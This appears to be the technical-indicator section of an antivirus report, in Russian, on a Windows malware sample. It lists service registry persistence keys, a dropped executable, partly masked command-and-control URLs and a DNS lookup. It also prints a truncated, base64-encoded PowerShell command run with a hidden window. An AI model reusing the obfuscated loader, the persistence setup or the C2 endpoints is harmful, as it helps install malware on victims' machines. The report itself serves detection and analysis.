Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData0414] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData0414] 'ImagePath' = '"%WINDIR%\SysWOW64\RMActivate_ssp\NlsData0414.exe"'
- 'NlsData0414' "%WINDIR%\SysWOW64\RMActivate_ssp\NlsData0414.exe"
- 'NlsData0414' %WINDIR%\SysWOW64\RMActivate_ssp\NlsData0414.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAawB5AG0ANwBzAD0AKAAnAFMAdQAnACsAKAAnAHUAdQAnACsAJwBqAHUAJwApACsAJwBjACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AcABcAFcATwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\xd4r2l.exe
- %WINDIR%\syswow64\rmactivate_ssp\nlsdata0414.exe
- %TEMP%\word\2019\xd4r2l.exe в %WINDIR%\syswow64\rmactivate_ssp\nlsdata0414.exe
- '37.#2.87.0':80
- http://je##m.com/themes/nu2/
- http://37.#2.87.0/ahbDD/CWIO/gR68X/dkOosoIi2kP/9NW2ioT0V/Z1PgvVFkzG1gjV8Jw/
- DNS ASK je##m.com
- '%TEMP%\word\2019\xd4r2l.exe'
- '%WINDIR%\syswow64\rmactivate_ssp\nlsdata0414.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAawB5AG0ANwBzAD0AKAAnAFMAdQAnACsAKAAnAHUAdQAnACsAJwBqAHUAJwApACsAJwBjACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AcABcAFcATwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)